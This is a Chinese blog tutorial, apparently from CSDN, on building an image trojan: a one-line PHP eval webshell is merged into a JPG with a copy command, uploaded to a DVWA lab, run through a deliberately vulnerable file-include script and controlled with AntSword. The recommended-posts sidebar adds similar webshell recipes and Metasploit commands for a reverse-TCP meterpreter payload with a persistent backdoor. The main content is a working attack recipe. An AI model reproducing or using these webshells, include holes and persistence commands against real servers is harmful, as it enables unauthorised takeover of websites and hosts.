简单图片木马的生成与利用

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量1w 收藏 34
点赞数 2
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/104210751
版权
  1. 首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。在这里插入图片描述


    2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 在这里插入图片描述进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入在这里插入图片描述



    3.在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg
    -b是指以二进制的方式合并复制文件,用于图像影音类文件
    -a是指以ascii方式合并复制文件,用于文本类文件
    在这里插入图片描述然后发现在原来的路径中已经生成了我们想要的文件在这里插入图片描述


    4.在靶机环境中上传我们的文件,上传成功会爆路径在这里插入图片描述复制路径到url打开在这里插入图片描述在这里插入图片描述


    5.但光是上传上去仍然不够,我们还需要一个脚本来执行我们的文件。
<?php

header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

上传方式有多种,这里我就将dvwa开最低直接传上去了在这里插入图片描述然后我们把爆出来的地址复制到url上在这里插入图片描述最后我们利用file参数将我们之前上传的jshell.jpg文件匹配进去

http://192.168.132.188/DVWA/hackable/uploads/include.php?file=jshell.jpg

在这里插入图片描述


6.然后我们开蚁剑进行配置连接,将本网页的url复制进去在这里插入图片描述可以进目录在这里插入图片描述

Deeeelete
关注
专栏目录
【WEB攻防】图片木马利用
weixin_45983744的博客
02-15 1万+
交流Q群:876554035 一,图片木马原理 图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。 二.工具及环境 DVWA靶场环境 010Editor 中国菜刀 三.具体步骤 1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。 图一 登陆界面 图二 选择安全级别,进入 2.利用01...
一句话图片木马
热门推荐
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 2271
图片马:就是在图片中隐藏一句话木马。利用.htaccess等。
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 9717
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马的图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
图片木马
阿刁〇的博客
05-21 3368
文章目录图片木马原理条件漏洞防范制作方法 图片木马 顾名思义,看上去很像图片的木马。 木马必然是个可执行的程序文件,其后缀名是“exe”。 原理 以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。 条件 图片能够正常显示 包含可执行的恶意代码 漏洞防范 尽量使用最新的web服务器版本 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限) 可以的话,对图片进行二次处理,把
Atitit.图片木马的原理与防范 attilax 总结
weixin_33724046的博客
02-17 185
Atitit.图片木马的原理与防范 attilax 总结   1.1. 像图片的木马桌面程序1 1.2. Web 服务端图片木马1 1.3. 利用了Windows的漏洞1 1.4. 这些漏洞不止Windows有,是很多软件都有,甚至sns wechat工具2 1.5. 利于图片meta数据区2 1.6. “会动的图片”—Flash动画,无需利用系统漏洞,而是利用动画本身的特性,直接对...
图片木马的制作
qq_46277212的博客
06-27 748
1.一张图片,jpg格式 1.jpg 2.一句话木马 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木马代码
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3831
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
msfvenom 生成php木马,利用msfvenom生成木马程序
weixin_36051235的博客
03-26 1889
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.二,工具:MSF三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线四,过程:1,查看帮助命令:root#msfvenom-h结果:2,生成meterpreterpayload并利用shikata_g...
C#判断上传文件是否是图片以防止木马上传的方法
09-04
尤其是在开发Web应用程序时,用户上传功能可能会被不法分子利用,他们可能将木马程序伪装成图片文件进行上传,从而对服务器安全构成威胁。C#作为.NET框架的主要编程语言,提供了多种方法来判断上传的文件是否为真正...
一句话木马与图片马
野原新之助
01-16 6595
何为木马? 所谓木马,即向目标主机种植恶意软件或程序(木马),通过主机与目标主机上种植好的木马进行连接,建立一个shell,达到控制目标主机的目的。 比较著名的木马有冰河、灰鸽子等,这些木马都是对主机进行控制。 今天总结的一句话木马,是通过对目标站点、服务器植入木马文件,对网站进行渗透控制。 通常对网站的木马文件植入,都是利用文件上传漏洞进行植入的,先植入小马,再通过小马将大马植入。 小马 小马一...
用python做一个木马_Python编写简易木马程序
weixin_34405261的博客
01-30 6338
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
基于Python/Socket实现小型的远程木马(包含实验)
BrosyveryOK的博客
10-05 2619
本文是用 Python 的 Socket 模块进行的服务搭建,主要是基于TCP服务的远程木马,因此要掌握一点TCP服务搭建的知识,可以参考我的另一篇文章,结合网上搜索的知识,搭建TCP服务器和客户端,然后再进行实验。用Python搭建非常简易的TCP客户端和服务器_br0sy的博客-CSDN博客还要用到 Python 的 os 模块,进行命令操作,接下去话不多说,直接开始写代码。
制作简单图片木马
Ro_kin的博客
07-20 9660
下面来制作一个简单图片木马 我就把电脑桌面的一个图片作为例子吧 下面是原始图片: test.png 接下来写一句话木马 新建一个muma.php文件,写入一句话木马<?php eval($_POST['hh']); ?>然后在win+R,cmd,cd到原始图片的目录路径下 我的就是桌面了,输入copy test.png/b+muma.php/a muma.png如图: 桌面
关于图片码的制作与使用
weixin_73180072的博客
11-02 862
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助。本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,读者请勿用于其他用途,否则后果自负。本来是两个文件,执行命令后会生成一个新文件,新文件就是图片马。图片马的使用前提是系统存在文件包含漏洞。
msf木马生成后怎么永久
06-06
在Metasploit Framework (MSF)中生成的木马默认情况下不是永久性的,它只是在目标机器上运行一次。如果您想让生成的木马在目标机器上保持永久性,您需要将其绑定到一个持久化机制上,例如Windows系统中的计划任务或服务。 以下是一个示例,演示如何使用Metasploit Framework (MSF)生成一个永久性后门,该后门将在Windows系统中的计划任务中运行: 1. 在MSF中,生成一个木马,例如Windows反向TCP后门: ``` use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST [您的IP地址] set LPORT [监听端口号] run ``` 2. 在目标机器上,使用Meterpreter会话执行以下命令,将生成的后门绑定到Windows计划任务中: ``` run persistence -U -i 30 -p [监听端口号] -r [您的IP地址] ``` 其中,“-U”表示使用用户级别的持久性,即只有当前用户登录时才会运行后门;“-i 30”表示每隔30秒就会检查后门是否运行,如果没有运行,则会自动启动;“-p”和“-r”选项分别指定监听端口和您的IP地址。 3. 等待目标机器执行计划任务,后门将在后台运行,并且每隔30秒检查一次是否运行。 请注意,将生成的后门绑定到一个持久化机制上可能会被杀毒软件或安全软件检测到,并且可能会被视为恶意软件。因此,使用此方法时请务必谨慎,并仅在合法授权的测试环境中使用。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值